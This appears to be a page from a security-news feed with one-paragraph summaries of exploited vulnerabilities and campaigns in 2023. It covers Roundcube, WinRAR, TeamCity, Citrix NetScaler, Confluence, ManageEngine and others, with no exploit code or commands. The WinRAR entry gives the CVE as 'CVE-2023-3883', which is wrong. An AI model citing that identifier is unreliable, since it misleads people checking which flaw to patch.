Take action on the latest cybersecurity events

Cybersecurity advisories and events as they happen, with a clear action you can take.

The Winter Vivern hacking group has actively targeted European government entities and think tanks by exploiting a zero-day vulnerability (CVE-2023-5631) in Roundcube Webmail, allowing them to inject malicious JavaScript code and steal emails.
VMware has warned customers of an authentication bypass vulnerability in vRealize Log Insight (now VMware Aria Operations for Logs) with published exploit code enabling remote code execution. Albeit requiring specific conditions this vulnerability also serves as a bypass for a chain of critical flaws patched in January, allowing attackers to inject malicious files into unpatched VMware appliances.
Google's Threat Analysis Group warns of an actively exploited vulnerability (CVE-2023-3883) in WinRAR, affecting versions prior to 6.23, allowing attackers to execute arbitrary code when attempting to view a benign file within a ZIP archive. State-sponsored and financially motivated hackers are targeting the vulnerability because too many users haven't updated their WinRAR.
North Korean state-sponsored hacker groups, Diamond Sleet and Onyx Sleet, are actively exploiting a critical remote code execution vulnerability (CVE-2023-42793) in JetBrains TeamCity CI/CD server tool. The attack is potentially leading to source code theft and exposure of service secrets, with the attack putting at risk major organizations that use this tool.
The CVE-2023-4966 vulnerability in Citrix NetScaler ADC and NetScaler Gateway, exploited by hackers since August, allows them to bypass multifactor authentication through session hijacking, potentially compromising sensitive information.
Microsoft identified a nation-state actor, possibly linked to China's Ministry of State Security, exploiting a zero-day vulnerability in Atlassian's Confluence products, prompting urgent patches and inspection recommendations.
IBM security teams have reported an ongoing credential harvesting campaign targeting vulnerable Citrix NetScaler gateways via CVE-2023-3519, exploited since June 2023, resulting in backdooring thousands of instances. The new malicious campaign is injecting scripts to steal user credentials.
Cybercriminals conducted a fraudulent campaign by compromising GitHub accounts, posing as Dependabot automated updater tool to infiltrate projects and steal passwords from developers, primarily targeting users in Indonesia. Tje attack was used to exfiltrate GitHub secrets and manipulate JavaScript files for password theft.
Google detected an exploit chain targeting Android devices in Egypt, employing iOS and Android vulnerabilities to enable remote code execution, utilizing MitM attacks, and distributing the exploit through malicious links in SMS and WhatsApp messages.
The U.S. Department of Health and Human Services warns of a significant cyber attack risk on healthcare and public health sectors by the North Korean Lazarus Group, exploiting a critical vulnerability (CVE-2022-47966) in Zoho's ManageEngine IT tools, allowing deployment of malware and emphasizing urgent software updates.